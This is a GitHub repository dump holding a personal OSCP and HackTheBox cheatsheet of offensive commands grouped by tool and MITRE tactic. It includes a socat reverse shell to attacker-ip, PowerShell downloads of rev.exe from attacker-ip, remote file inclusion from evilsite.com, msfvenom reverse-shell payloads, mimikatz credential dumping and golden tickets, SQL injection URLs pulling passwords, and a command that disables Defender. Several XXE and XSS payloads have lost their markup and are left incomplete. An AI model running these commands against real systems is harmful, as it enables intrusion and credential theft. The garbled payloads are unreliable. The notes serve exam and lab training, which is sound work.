Repository: tagnullde/OSCP
Branch: master
Commit: fcb5175c7432
Files: 2
Total size: 32.5 KB
Directory structure:
gitextract_8acdw6_s/
├── README.md
└── oscp-cheatsheet.md
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# OSCP / HackTheBox
These are my notes and exploits I wrote while preparing for the OSCP and playing CTF on HackTheBox.
## Cheatsheet usage
The cheatsheet is meant to be as searchable as possible.
A such you have the following options to search for an entry:
1. You can search for a known **toolname**:
- example: "gobuster"
- example: "rpcclient"
2. You can search for the targeted **service**:
- example "service: smb"
- example "service: ftp"
3. You can search for **MITRE-tactics**:
- example "tactics: enumeration"
- example "tactics: lateral_movement"
4. You can search for tool **suites**:
- example: "suites: impacket"
- example: "suites: powershell_empire"
Some parts of this document still need some work. Feel free to submit a PR.
## Exploit-Development
I moved this folder to it's own [repository](https://github.com/tagnullde/Exploit-Development)
================================================
FILE: oscp-cheatsheet.md
================================================
# OSCP-Cheatsheet
# nmap
- service: all
- tactics: enumeration
## enumerate services and use default scripts
- `nmap -sC -sV -oN normal.txt target-ip`
## scan all tcp ports
- `nmap -p- -oN all_ports.txt target-ip`
## scan all udp ports
- `nmap -p- -sU -oN all_udp_ports.txt target-ip`
## use script categories
- `nmap --script vuln,safe,discovery -oN scan.txt target-ip`
## list all nse scripts
- `ls -lh /usr/share/nmap/scripts/`
## nmap through socks4 proxy
- `nmap --proxies socks4://proxy-ip:1080 target-ip`
## ftp bounce scan
- `nmap -P0 -n -b username:password@target-ip target2-ip --proxies socks4://proxy-ip:1080 -vvvv`
---
# gobuster
- service: http
- tactics: enumeration
## bruteforce webdirectories and files by extention
- `gobuster dir -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 30`
---
# wfuzz
- service: http
- tactics: enumeration
## bruteforce web parameter
- `wfuzz -u http://target-ip/path/index.php?param=FUZZ -w /usr/share/wordlists/rockyou.txt`
## bruteforce post data (login)
- `wfuzz -u http://target-ip/path/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/rockyou.txt`
---
# fuff
- service: http
- tactics: enumeration
## bruteforce web directories
- `ffuf -w /path/to/wordlist -u https://target/FUZZ`
---
# davtest
- service: webdav
- tactics: enumeration
## tries to upload (executable) files to webdav
- `davtest -url http://target-ip/ -sendbd auto`
---
# peass - privilege escalation awesome scripts suite
- service: windows
- service: linux
- tactics: enumeration
## very easy to use on linux
- `./linpeas.sh`
## windows has multiple versions
- `winpeasx64.exe`
- `winpeasx86.exe`
- `winpeas.bat`
---
# capabilities
- service: linux
- tactics: privilege_escalation
```
# Check the links at the bottom for more examples and explanation
```
## exploit `cap_setuid` capability on python3 to gain a local root-shell
- `python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'`
---
# mount
- service: smb
- tactics: enumeration
- tactics: inital_access
## mount shares
- `mount -o hard,nolock target-ip:/home folder`
- `mount -t cifs -o user=username,domain=domainname //target-ip/share /mnt/folder`
- `mount -t nfs target-ip:share /mnt/folder -o nolock`
---
# showmount
- service: smb
- tactics: enumeration
## list Shares
- `showmount -e target-ip`
---
# enum4linux
- service: all
- tactics: enumeration
## scan target-ip
- `enum4linux target-ip`
---
# rpcdump.py
- service: rpc
- tactics: enumeration
- suites: impacket
## dump rpc endpoints
- `/opt/impacket/examples/rpcdump.py username:password@target-ip`
---
# lookupsid.py
- service: rpc
- tactics: enumeration
- suites: impacket
## get sid via rpc
- `/opt/impacket/examples/lookupsid.py username:password@target-ip`
---
# smbclient.py
- service: smb
- tactics: enumeration
- tactics: inital_access
- suites: impacket
## semi-interactive smb-client
- `python3 /opt/impacket/examples/smbclient.py username@target-ip`
- `python3 /opt/impacket/examples/smbclient.py 'username'@target-ip`
- `python3 /opt/impacket/examples/smbclient.py ''@target-ip`
---
# snmpwalk
- service: snmp
- tactics: enumeration
## gather snmp v1 information with standard community strings
- `snmpwalk -v1 -c public target-ip`
- `snmpwalk -v1 -c private target-ip`
- `snmpwalk -v1 -c manager target-ip`
## enumerate windows users
- `snmpwalk -c public -v1 target-ip 1.3.6.1.4.1.77.1.2.25`
## enumerate current windows processes
- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.25.4.2.1.2`
## enumerate windows open tcp ports
- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.6.13.1.3`
## enumerate installed software
- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.25.6.3.1.2`
## make use of MIB files and translate the OIDs automatically
- default folder for MIB files: `/usr/share/snmp/mibs`
- `export MIBS=ALL`
---
# onesixtyone
- service: snmp
- tactics: enumeration
## bruteforce community strings
```
echo public > community.txt
echo private >> community.txt
echo manager >> community.txt
for ip in $(seq 200 254); do echo 1.2.3.${ip}; done > target-ip.txt
```
- `onesixtyone -c community.txt -i target-ip.txt`
---
# rpcclient
- service: rpc
- tactics: enumeration
- tactics: inital_access
## get information via rpc with username
- `rpcclient -U username target-ip`
## get information via rpc without username
- `rpcclient -U "" target-ip`
### sub-commands once connected
- `srvinfo`
- `lookupnames username`
---
# ftp
- service: ftp
- tactics: enumeration
- tactics: inital_access
## login via ftp
- `ftp target-ip`
### anonymous login
- `username: anonymous`
- `password: anonymous`
---
# XML External Entity (XXE)
- service: http
- tactics: enumeration
- tactics: inital_access
## Read local files
```xml
]>
&xxe;
```
## Read binary or files that otherwise can't be display (.php)
```xml
]>
&xxe;
```
---
# Java-Web-Token (JWT)
- service: http
- tactics: inital_access
## Sign JWT with own key - might need a webserver serving the private key
```python
python3 jwt_tool.py [eyJ0eXAiOiJKV1QiLCJhbG..snip..] -I -hc kid -hv "http:///jwt.pub" -pc -pv <1> -S rs256 -pr jwt.key
```
---
# ldapsearch
- service: ldap
- tactics: discovery
`ldapsearch -x -h target-ip -b "dc=domain,dc=tld"`
---
# windapsearch.py
- service: ldap
- tactics: discovery
#
- `./windapsearch.py -d host.domain.tld -u domain\\ldapbind -p password -U`
---
# evil-winrm
- service: winrm
- tactics: lateral_movement
# get shell via evil-winrm
- `./evil-winrm.rb -u username -p password -i target-ip`
---
# telnet
- service: smtp
- service: pop
- serivce: telnet
- tactics: collection
## send mail via telnet
```
# connect
telnet target-ip 25
# provide valid or fake email-address
EHLO username@domain.tld
# set mail-from
MAIL FROM:
# set recipient-to
RCPT TO:
# set body and sent mail
DATA
354 Ok Send data ending with .
FROM: username@domain
Hallo World!
.
```
## get mails via pop3
```
# connect
telnet target-ip 110
# login
USER username
PASS password
# list emails
LIST
# retrieve emails
RETR 1
```
---
# smtp-user-enum
- service: smtp
- tactics: enumeration
## verify that user exists on system with higher delay to make sure we get all responses
- `smtp-user-enum -M VRFY -U user-file -t target-ip -m 60 -w 20`
---
# nikto
- service: http
- tactics: enumeration
## scan website for vulnerabilities
- `nikto -C all -h http://target-ip`
---
# wpscan
- service: http
- tactics: enumeration
## scan wordpress installation for vulnerabilities
- `wpscan --url http://target-ip/ --enumerate p`
---
# nc
- service: all
- tactics: enumeration
- tactics: inital_access
## logfile injection
```
nc target-ip target-port
GET / HTTP/1.1
Host:
Connection: close
```
### Afterwards include the it via lfi
- `?lfi_file=/var/log/apache2/access.log&cmd=`
---
# dig
- service: dns
- tactics: enumeration
## full zone transfer
- `dig -t AXFR target-dns-ip`
---
# host
- service: dns
- tactics: enumeration
## full zone transfer
- `host -l target-dns-ip`
---
# mysqldump
- service: sql
- tactics: initial_access
## backup all mysql databases
- `mysqldump -u username -ppassword --all-databases --single-transaction`
---
# sqli
- service: sql
- service: http
- tactics: inital_access
## check if you can find a row, where you can place your output
- `http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8`
## get the version of the database
- `http://target-ip/inj.php?id=1 union all select 1,2,3,@@version,5`
## get the current user
- `http://target-ip/inj.php?id=1 union all select 1,2,3,user(),5`
## see all tables
- `http://target-ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables`
## get column names for a specified table
- `http://target-ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'`
## concat user names and passwords (0x3a represents “:”)
- `http://target-ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users`
## write into a file
- `http://target-ip/inj.php?id=1 union all select 1,2,3,"content",5 into OUTFILE 'outfile'`
---
# searchsploit
- service: all
- tactics: enumeration
# filter search for specific kernel versions
- `searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6`
---
# curl
- service: http
- service: imap
- tactics: exfiltration
## download emails via curl
- `curl --insecure --url "imaps://target-domain/Drafts;UID=4" --user "username:password"`
## bypass useragent blacklisting
- `curl -A "Googlebot" http://target-ip/robots.txt`
---
# scp
- service: ssh
- tactics: inital_access
## copy file to target
- `scp -r username@target-ip:/path/to/foo /home/username/desktop/`
---
# ssh
- service: ssh
- tactics: inital_access
- tactics: lateral_movement
## create ssh-key
- `ssh-keygen`
### add public-key to authorized_keys
- `cat rsa.pub >> authorized_keys`
### set permission on private-key
- `chmod 600 id_rsa`
## login via ssh-key
- `ssh -i id_rsa username@target-ip`
### login with older ciphers
- `ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc username@target-ip`
## start tool after ssh login
- `ssh username@target-ip -o "ProxyCommand=ncat --proxy-type http --proxy target-ip:proxy-port 127.0.0.1 22"`
## ssh port forwarding
- `ssh -N -L 80:127.0.0.1:80 username@target-ip`
## dynamic ssh port forward
- `ssh -N -D 9050 username@target-ip`
---
# proxychains
- service: ssh
- tactics: lateral_movement
## a dynamic ssh tunnel is needed
> search ssh
## Use `proxychains + command" to use the socks proxy
- `proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv`
> Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port.
After the tunnel is up, you can comment out the first socks entry in proxychains config.
---
# sshuttle
- service: ssh
- tactics: lateral_movement
## pivot via sshuttle
- `sshuttle -vr `
- `sshuttle -vr username@target-ip 10.1.1.0/24`
---
# smbmap
- service: smb
- tactics: discovery
## guest login
- `smbmap -u whateverusername -H target-ip`
## anonymous login
- `smbmap -H target-ip`
---
# smbserver.py
- service: smb
- tactics: exfiltration
- suites: impacket
## fake smb server for uploading and downloading files
- `python3 /opt/impacket/examples/smbserver.py -smb2support files $(pwd)`
---
# pth-smbclient
- service: smb
- service: ntlm
- tactics: lateral_movement
- suites: pth-toolkit
## connect to target-share and auth via ntlm-hash
- `pth-smbclient --user=username --pw-nt-hash -m smb3 \\\\target-ip\\target-share ntlm-hash`
---
# pth-winexe
- service: smb
- service: ntlm
- tactics: lateral_movement
- suites: pth-toolkit
# run command on target-ip and auth via ntlm-hash
- `pth-winexe -U ntlm-hash //target-ip cmd`
---
# vinagre
- service: vnc
- tactics: lateral_movement
# vnc connect
- `vinagre`
---
# medusa
- service: http
- service: basic_auth
- tactics: credential_access
## bruteforce basic_auth
- `medusa -h target-ip -U ../creds/usernames.txt -P ../creds/passwords.txt -M http -m DIR:/printers -T 10`
---
# hydra
- service: http
- service: http_post
- service: sql
- tactics: credential_access
## bruteforce http_post with example post-data
- `hydra -l root@localhost -P /usr/share/wordlists/rockyou.txt target-ip http-post-form "/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-60&User=^USER^&Password=^PASS^:
Login failed!"`
## bruteforce mssql
- `hydra -l sa -P ../creds/pass.txt target-ip -s target-port mssql`
---
# patator
- service: ssh
- tactics: credential_access
## bruteforce ssh
- `patator ssh_login host=target-ip port=22 user=username password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt`
- Optional: `-x ignore:fgrep='failed.'`
---
# burp
- service: http
- tactics: enumeration
## bypass ip blacklist / whitelist
- `X-Forwarded-For: $allowed-ip`
---
# xss payloads
- service: http
- tactics: inital_access
## xss enumeration payloads
- `'">>`
- `'">>`
- `'">>`
## xss redirect to own webserver
- `'">>`
- `'">>`
---
# local file inclusion / remote file inclusion
- service: http
- service: php
- tactics: inital_access
## including remote code
- `?file=[http|https|ftp]://evilsite.com/shell.txt`
## using php stream php://input
- `?file=php://input`
## using zip wrapper zip://input
- `?file=zip://path/file.zip%23rce.php`
## specify your payload in the post parameters
### using php stream php://filter
- `?file=php://filter/convert.base64-encode/resource=index.php`
### using data uri
- `?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=`
### using xss
- `?file=http://127.0.0.1/path/xss.php?xss=phpcode`
## inject php code in logfile with nc and retrieve it afterwards
> search for nc
---
# mssqlclient.py
- service: sql
- tactics: lateral_movement
- suites: impacket
## connect to windows mssql Server
- `mssqlclient.py -windows-auth username@target-ip`
## list all databases
- `select name from sys.databases`
- `select name from master.dbo.sysdatabases`
## use database
- `use [database]`
## get tables
- `select * from [database].information_schema.tables`
---
# mssql-cli
- service: sql
- tactics: lateral_movement
## connect to windows mssql Server
- `mssql-cli -S target-ip -U username`
---
# bloodhound
- service: ldap
- serivce: active_directory
- tactics: lateral_movement
- tactics: privilege_escalation
## invoke-bloodhound from sharphound.ps1
- `import-module .\sharphound.ps1`
- `invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password`
---
# getnpusers.py
- service: kerberos
- tactics: credential_access
- tactics: lateral_movement
## check ASREPRoast for all domain users (credentials required)
- `python GetNPUsers.py /: -request -format -outputfile `
## check ASREPRoast for a list of users (no credentials required)
- `python GetNPUsers.py / -usersfile -format -outputfile `
## check kerberoast
- `impacket-GetUserSPNs '/:' -dc-ip -request`
## crack as_rep_response_file
> search for hashcat / john
---
# hashcat
- service: all
- tactics: credential_access
## crack as_rep_response_file (asreproast)
- `hashcat -m 18200 -a 0 as_rep_response_file passwords_file`
## crack as_rep_response_file (kerberoast)
- `hashcat -m 13100 --force TGSs_file passwords_file`
---
# john
- service: all
- tactics: credential_access
## crack as_rep_response_file (asreproast)
- `john --wordlist=passwords_file as_rep_response_file`
## crack as_rep_response_file (kerberoast)
- `john --format=krb5tgs --wordlist=passwords_file AS_REP_responses_file`
## mangle wordlist
- `john --wordlist=month --rules --stdout > new_list`
## crack ssh keys
- `/usr/share/john/ssh2john.py id_rsa > hash.john`
- `john --wordlist=/usr/share/wordlists/rockyou.txt hash.john`
---
# secretsdump.py
- service: kerberos
- tactics: credential_access
- suites: impacket
## dcsync
- `/usr/share/doc/python3-impacket/examples/secretsdump.py username@target-ip -dc-ip target-ip`
---
# invoke-kerberoast.ps1
- service: kerberos
- tactics: credential_access
- suites: powershell_empire
## execute invoke-kerberoast.ps1
- `invoke-kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII `
---
# gettgt.py
- service: kerberos
- tactics: credential_access
- suites: impacket
## overpass the hash
## Request the TGT with hash
- `python getTGT.py / -hashes [lm_hash]:`
## Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
- `python getTGT.py / -aesKey `
## Request the TGT with password
- `python getTGT.py /:[password]`
## Set the TGT for impacket use
- `export KRB5CCNAME=`
### Execute remote commands with any of the following tools by using the TGT
> search for psexec.py, smbexec.py or wmiexec.py
---
# ticket_converter.py
- service: kerberos
- tactics: credential_access
## convert tickets between linux / windows format
[ticket_converter.py](https://github.com/Zer1t0/ticket_converter):
- `python ticket_converter.py ticket.kirbi ticket.ccache`
- `python ticket_converter.py ticket.ccache ticket.kirbi`
### to use ticket
> search for gettgt.py
---
# mimikatz
- service: kerberos
- tactics: credential_access
## enable log
- `log filename.log`
## enable debug mode
- `privilege::debug`
## dump passwords from memory
- `sekurlsa::logonpasswords`
## dump passwords from sam database
- `lsadump::sam /system:f:\SYSTEM /sam:f:\SAM`
## export tickets
- `sekurlsa::tickets /export`
## pass the hash
- `sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash`
## silver_ticket
### to generate the TGS with NTLM
- `mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:`
### to generate the TGS with AES 128 key
- `mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:`
### to generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
- `mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:`
### Inject TGS with mimikatz
- `mimikatz # kerberos::ptt `
## golden_ticket
### to generate the TGT with NTLM
- `mimikatz # kerberos::golden /domain:/sid: /rc4: /user:`
### to generate the TGT with AES 128 key
- `mimikatz # kerberos::golden /domain:/sid: /aes128: /user:`
### to generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
- `mimikatz # kerberos::golden /domain:/sid: /aes256: /user:`
### inject TGT with mimikatz
- `mimikatz # kerberos::ptt `
---
# ticketer.py
- service: kerberos
- tactics: credential_access
- suites: impacket
## silver_ticket
### to generate the TGS with NTLM
- `python ticketer.py -nthash -domain-sid -domain -spn `
### to generate the TGS with AES key
- `python ticketer.py -aesKey -domain-sid -domain -spn `
### set the TGT for impacket use
- `export KRB5CCNAME=`
## golden_ticket
### to generate the TGT with NTLM
- `python ticketer.py -nthash -domain-sid -domain `
### to generate the TGT with AES key
- `python ticketer.py -aesKey -domain-sid -domain `
### set the ticket for impacket use
- `export KRB5CCNAME=`
> search for psexec.py, smbexec.py or wmiexec.py
---
# psexec.py
- service: rpc
- tactics: lateral_movement
- suites: impacket
## Execute remote commands with any of the following by using the TGT
- `python psexec.py /@ -k -no-pass`
---
# smbexec.py
- service: smb
- tactics: lateral_movement
- suites: impacket
## Execute remote commands with any of the following by using the TGT
- `python smbexec.py /@ -k -no-pass`
---
# wmiexec.py
- service: wmi
- tactics: lateral_movement
- suites: impacket
## Execute remote commands with any of the following by using the TGT
- `python wmiexec.py /@ -k -no-pass`
---
# psexec.exe
- service: smb
- tactics: lateral_movement
- suites: pstools
## run psexec
- `.\PsExec.exe -accepteula \\ cmd`
- `PsExec64.exe \\remote_hostname> -u -p shell64.exe`
---
# gcc
- service: all
- tactics: weaponization
## cross compile for 32bit (m32) and all linux flavors (gnu, sysv)
- `apt-get install libc6-dev-i386`
- `gcc -m32 -Wall -Wl,--hash-style=both 9545.c -o exploit`
## cross compile for 32Bit windows (on 64bit linux)
- `i686-w64-mingw32-gcc -o ms11-046.exe ms11-046.c -lws2_32`
## cross compile for 32bit windows (on 32bit linux)
- `apt-get install mingw32`
- `i586-mingw32msvc-gcc .c -o -lws2_32`
## static application
> To compile static applications use the “-static” parameter additionally
## skelleton c code which calls system()
```
#include
int main ()
{
int i;
i = system("net localgroup administrators theusername /add");
return 0;
}
```
---
# pyinstaller.py
- serivce: all
- tactics: weaponization
## generate exe from python file in windows
- `python pyinstaller.py --onefile `
---
# reg.exe
- service: sam
- tactics: credential_access
## dump sam database
- `reg save HKLM\sam sam`
- `reg save HKLM\system system`
## query vnc passwords
- `reg query "HKCU\Software\ORL\WinVNC3\Password"`
## Windows autologin
- `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"`
- `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"`
---
# samdump2
- service: sam
- tactics: credential_access
- `samdump2 SYSTEM SAM > hashes.db`
---
# unshadow
- service: sam
- tactics: credential_access
## unshadow /etc/passwd file
- `unshadow shadow passwd > unshadow.db`
---
# plink.exe
- service: all
- tactics: lateral_movement
## Port forward using plink
- `plink.exe -l username -pw password target-ip -R 8080:127.0.0.1:8080`
---
# socat
- serivce: all
- tactics: command_and_control
# reverse_shell
## attacker
- ``socat file:`tty`,raw,echo=0 tcp-listen:12345``
## target:
- `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker-ip:12345"`
---
# runas
- serivce: windows
- tactics: privilege_escalation
## privileged file copy
- `runas /user:hostname\Administrator /savecred "cmd.exe /c type c:\users\administrator\desktop\root.txt > C:\Users\security\AppData\Local\Temp\root.txt"`
## privileged powershell execution
- `runas /user:hostname\Administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\boom.ps1"`
## privileged cmd execution
- `runas /user:administrator /savecreds cmd.exe`
---
## powershell
- serivce: windows
- tactics: execution
### powershell upload
- `powershell Invoke-WebRequest "http://attacker-ip:81/x41.csproj" -OutFile "C:\ProgramData\x41.csproj"`
- `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://attacker-ip/rev.exe', 'C:\ProgramData\')"`
### powershell disable av
- `Set-MpPreference -DisableRealtimeMonitoring $true`
---
# potato.exe
- serivce: windows
- tactics: privilege_escalation
## hot potato usage
- `potato.exe -ip -cmd "c:\\windows\\system32\\cmd.exe /K net users username password /add" -disable_exhaust true`
---
# Metasploit
- serivce: all
- tactics: command_and_control
## Port forward using meterpreter
- `portfwd add -l -p -r `
- `portfwd add -l 3306 -p 3306 -r 192.168.1.101`
---
# msfvenom
- serivce: all
- tactics: weaponization
## Linux ELF binary
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`
## Windows EXE binary
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`
### 32 Bit
- `msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell32.exe`
### 64Bit
- `msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell64.exe`
## Windows Service
- `msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT= EXITFUNC=thread -f exe-service > shell-service.exe`
## Mac
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`
## PHP
- `msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > /tmp/shell.php && sed -i 's/# If you use php/reverse_php open the output file with an editor and add `` within the script.
## ASP
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp`
## JSP
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`
## WAR
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`
## Inject payload into an existing exe file
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x -f exe > `
## dep bypass payload
- `windows/meterpreter/reverse_nonx_tcp`
## multi handler
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/migrate
set lhost 10.10.12.102
set lport 9001
exploit
```
---
# misc
## python injected shell
- `__builtins__.__import__('os').system('/bin/bash -i')`
# exploit development
## finding offset
### gef
- `pattern create 128`
- `pattern search 0x6161616`
### msf
- `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000`
- `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q `
### pwntools
```python3
from pwn import *
# n = 4 == 32Bit; n = 8 == 64 Bit
cyclic(128, n=4)
cyclic_find('6161616', n=4)
Where 61616161 = value not address
```
# find "jmp esp" with mona.py
- `!mona find -type instr -s "jmp esp" -m `
# list of bad characters
```python
b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff'
```
# gdb
## list memory of process
- `info files`
## find "jmp esp" with gdb
- `find /b , , 0xff, 0xe4`
## list shared modules
- `info sharedlibrary`
## serve binary via network
- `socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:"stdbuf -i0 -o0 -e0 ./binary"`
# helper functions
```python
import struct
def p64(x):
return pack("